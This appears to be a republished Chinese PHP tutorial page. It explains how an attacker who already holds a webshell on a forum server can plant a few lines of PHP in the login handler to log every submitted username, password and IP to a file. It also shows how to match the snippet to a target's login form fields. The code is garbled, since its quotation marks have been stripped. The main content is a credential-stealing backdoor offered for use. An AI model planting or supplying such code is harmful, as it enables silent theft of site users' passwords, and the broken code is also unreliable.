微信公众号 讲师中心
首页
文章
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 自媒体 新闻
专题
后端开发 web前端 数据库 开发工具 php框架 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程 新闻
AI工具
AI 聊天问答 Agent智能体 AI 文本写作 AI 绘画作图 AI 设计工具 AI 视频创作 AI 音频制作 AI 办公学习 AI 编程开发 Prompt指令
学习
大前端 后端开发 数据库 移动端 运维开发 计算机基础
编程手册
大前端 后端开发 数据库 移动端 运维开发 计算机基础
下载
js特效 网站源码 工具下载 类库下载 网站素材 学习资源 插件扩展 手机/移动开发 手机游戏
搜索
后端开发 web前端 数据库 开发工具 php框架 常见问题 科技 Java 系统教程 电脑教程 硬件教程 手机教程 软件教程 游戏教程
自媒体 新闻
首页 > 后端开发 > php教程 > 正文

截取php后台登陆密码的代码_PHP教程

php中文网
发布: 2016-07-13 17:43:58
原创
1482人浏览过

拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。

 
 
if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb 
fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件
 
 
下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。
 
我只复制了关键代码过来.
 
 
//action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为POST,所以用$_POST接收。
 
。。。。强大的省略号。。。。。。
 
账号(U):
class=input id=pwuser accessKey=u size=16 
name=pwuser>
//用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwuser]
 
密 码(P):
class=input id=pwpwd accessKey=p 
type=password size=16 name=pwpwd>
//用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwpwd]
 

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/478807.htmlTechArticle拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,...
相关标签:
php discuz

大家都在看:

PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
收藏 点赞
上一篇:PHP+TEXT留言本(二)_PHP教程 下一篇:php生成psd缩略图_PHP教程
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
PHPSession怎么销毁_PHPSession销毁方法及用户登出处理。 正确销毁PHPSession需先session_start()启动会话,清空$_SESSION并调用session_destroy()删除服务器数据,再通过setcookie()清除客户端Cookie,设置过期时间为过去值,并指定路径为根目录,同时可调用session_regenerate_id(true)防止会话固定攻击,最后使用header("Location:login.php")重定向至登录页,避免后退访问,确保登出彻底安全。
2025-11-11 21:04:02
672
如何用PHP代码实现微服务架构集成_PHP微服务架构集成与通信实现教程 可通过PHP实现微服务架构的集成与通信。具体方法包括:一、使用RESTfulAPI进行服务间通信,通过Slim或Lumen框架创建接口,结合file_get_contents或stream_context_create发送HTTP请求并处理JSON响应;二、基于消息队列实现异步通信,利用RabbitMQ或Redis配合php-amqplib库实现消息的发布与消费,并通过ack机制确保可靠性;三、采用gRPC实现高性能调用,通过.proto文件定义接口,使用protoc生成PHP代码,实现服务端与
2025-11-11 21:03:33
133
php调用SOAP服务的配置_php调用WebService的完整流程 PHP调用SOAP服务需启用soap扩展,通过SoapClient类加载WSDL文件,分析接口方法与参数结构,构造请求数据并调用远程方法,支持复杂参数、命名空间及自定义Header,结合异常处理与调试功能完成交互。
2025-11-11 21:02:02
324
如何搭建PHP本地服务器_使用XAMPP快速搭建环境的详细步骤 首先下载安装XAMPP,配置Apache和MySQL服务,将PHP项目放入htdocs目录,通过修改httpd-vhosts.conf和hosts文件实现自定义域名访问。
2025-11-11 21:01:02
424
为什么PHP调用图像旋转角度设置错误_PHP图像旋转角度设置错误问题排查与图像处理教程 首先确认imagerotate()角度参数是否正确,正值逆时针、负值顺时针;其次检查图像资源是否成功加载并处理EXIF方向信息;最后确保输出时设置正确头信息并避免浏览器缓存。
2025-11-11 20:47:02
969
php代码前端资源调用慢怎么优化_php代码前端JS/CSS调用优化与加载性能提升方法 通过合并压缩文件、启用Gzip与浏览器缓存、异步加载非关键资源及使用CDN分发,可显著提升PHP项目中JS和CSS的加载效率,减少请求次数并优化传输性能。
2025-11-11 20:42:03
236
php源码如何重构_php老旧源码重构与现代化改造方法 老旧PHP重构需系统性提升可维护性、性能与安全性,先评估代码库结构与风险,建立测试与CI/CD保障机制,再分层解耦逻辑、引入现代PHP特性与PSR标准,升级数据库安全与防护措施,最后通过渐进式策略试点推进,确保业务稳定。
2025-11-11 20:40:03
777
php网站怎么部署到wampformac_php网站wampformac环境部署与配置方法 MAMP是macOS下的本地服务器环境,用于替代不支持macOS的WampServer。它集成了Apache、MySQL和PHP,适用于Mac系统。用户需从官网下载并安装MAMP,将PHP项目放入/Applications/MAMP/htdocs目录,启动服务器后通过http://localhost:8888/项目名访问网站,操作简便且兼容性强。
2025-11-11 20:33:03
173
php怎么用twig_PHP Twig模板引擎使用与模板渲染方法 使用Twig模板引擎可实现PHP项目中视图与逻辑分离。首先通过Composer安装Twig并引入自动加载文件;接着配置Twig环境,指定模板目录和缓存设置;然后在templates目录下创建.html.twig模板文件,使用变量、条件、循环等语法构建页面结构;之后在PHP脚本中准备数据并调用render方法渲染模板输出HTML;最后可通过注册自定义函数(如format_date)并添加为Twig函数,在模板中调用以扩展功能,提升灵活性与可维护性。
2025-11-11 20:23:24
850
php网站响应时间过长怎么优化_php网站响应速度提升与性能调优教程 优化PHP网站响应速度需从代码、数据库、服务器和前端四方面入手:1.优化PHP代码效率,避免重复计算和循环中查询,启用OPcache;2.提升数据库性能,添加索引、避免SELECT*、使用缓存;3.合理配置Web服务器,采用PHP-FPM、调整进程数、启用Gzip;4.优化前端资源,压缩文件、使用CDN、启用浏览器缓存。
2025-11-11 20:23:02
330
相关专题
更多>
热门推荐
开源免费商场系统广告
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • PHP学习

  • 技术支持

  • 返回顶部